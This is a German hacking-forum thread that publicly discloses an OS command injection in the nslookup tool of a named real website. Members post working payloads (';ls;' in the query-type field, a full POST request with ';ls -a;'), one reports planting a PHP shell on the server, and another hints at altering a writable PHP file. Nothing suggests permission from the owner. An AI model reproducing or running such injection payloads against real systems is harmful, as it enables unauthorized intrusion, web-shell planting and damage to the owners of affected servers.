Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[OSCI]networking.ringofsaturn.com

- - - - - webhacking osci

  • Bitte melde dich an um zu Antworten
8 Antworten in diesem Thema

#1
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux

URL:

https://networking.ringofsaturn.com/Tools/nslookup.php

Bei "Hostname" geben wir einen beliebigen Domainnamen ein.

"Query Type" ändern wir mit der Funktion "Element untersuchen" im Firefox folgendermaßen um:

<option value=";ls;">;ls;</option>

Dann klicken wir auf "Submit".

 

ds8txjdypk9rj5vy8.png


  • Ch!ller, CyberFlash und SecurityFlaw gefällt das

#2
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    211
  • 219 Beiträge
  • 184 Bedankt

Nice gefunden. 

 

FreeBSD tethys.ringofsaturn.com 11.1-STABLE FreeBSD 11.1-STABLE #12 r331093: Sun Mar 18 13:32:07 CDT 2018 root@tethys.ringofsaturn.com:/usr/obj/usr/src/sys/GENERIC amd64

 
 

<option value=";ls;">;ls;</option>

 

Den Value ändern versteh ich noch. Aber warum was zwischen dem <option> tag steht?

 

 

 


#3
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Normal reicht es, den Parameter bei Value zu ändern. Das beim Option-Tag habe ich nur wegen der besseren Übersicht gemacht :)

#4
SecurityFlaw

SecurityFlaw

    ██████████

  • Members
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    212
  • 256 Beiträge
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

So gehts doch auch:

78r9Hf0.png

https://networking.ringofsaturn.com/Tools/nslookup.php | POST: domain=127.0.0.1&server=tethys.ringofsaturn.com&querytype=;ls -a;

EDIT: "ls -all" zeigt mehr an ;)


Bearbeitet von SecurityFlaw, 03 April 2018 - 20:37 Uhr.

  • PaulaAbdul und Zero-X gefällt das

#5
sub0

sub0

    Script Kiddie

  • Premium Member
  • Likes
    32
  • 39 Beiträge
  • 14 Bedankt
  • Android
  • Windows, Linux

Hab mich durchgekämpft und 'ne php Shell gedroppt. Na, fällt euch was auf? :831:

h4nya5Y.png


  • SecurityFlaw und 3eyes gefällt das

/dev/zero - PN für XMPP


#6
pi^2

pi^2

    Hacker

  • Premium Member
  • Likes
    273
  • 181 Beiträge
  • 46 Bedankt

hat wohl jemand was kaputt gemacht ...

 

weniger deface, mehr wissensmenge sammeln, "durchkämpfen" ist bei ner OSCI wohl nicht so schwer, soweit ich weiß: ../links.php owner: www => hätte man hier nurn snippet adden müssen.


  • Zero-X gefällt das

#7
sub0

sub0

    Script Kiddie

  • Premium Member
  • Likes
    32
  • 39 Beiträge
  • 14 Bedankt
  • Android
  • Windows, Linux

Ich, zu meiner Person: habe weder irgendein defacement, noch irgendwas kaputt gemacht.

 

Aber danke für deinen Ratschlag mehr Wissen zu sammeln.


/dev/zero - PN für XMPP


#8
SecurityFlaw

SecurityFlaw

    ██████████

  • Members
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    212
  • 256 Beiträge
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

Passiert leider häufig, das veröffentlichte Sicherheitslücken zum Verlust des Servers führen.

Musste wohl wieder jemand kaputtspielen was?


  • Zero-X gefällt das

#9
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Wenn man eine Sicherheitslücke auf einer Seite public macht, muss man damit rechnen das Unsinn damit gemacht wird. Ich finde so etwas unfair den Leuten gegenüber die  anhand der Lücke noch etwas lernen wollen.
  • SecurityFlaw gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 60 user(s)


    1x1, 3eyes, B1nary, bebekid32, Bloodman, blue_eyed_devil, caballo, Ch!ller, cubik, Cyber Tjak, CyberFlash, desmond, docsnider, Dr. Spic, fl4shx, Framerater, Franziskaner, Freshness28, FrogPussyGreen, Gatsby13, Giganet, gtawelt, hacked, hanshenkelman, hlaus777, jmPesp, kiwitone, Klaus, leonalexkraus, lNobodyl, marcf2009, mettbrot, Mini Rick, Mofug, Mr_NiceGuy, nibble nibble, o0o, Osed28, p.samson, PadX18, PaulaAbdul, pepeSito, peppi200, phreshmail, pi^2, ProHex, Psykoon303, pwcca, R3s1stanc3, s3ff, SecurityFlaw, SerimArda, sub0, sup3ria, Terrafaux, VerZus, vitovice, z91, Zero-X, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.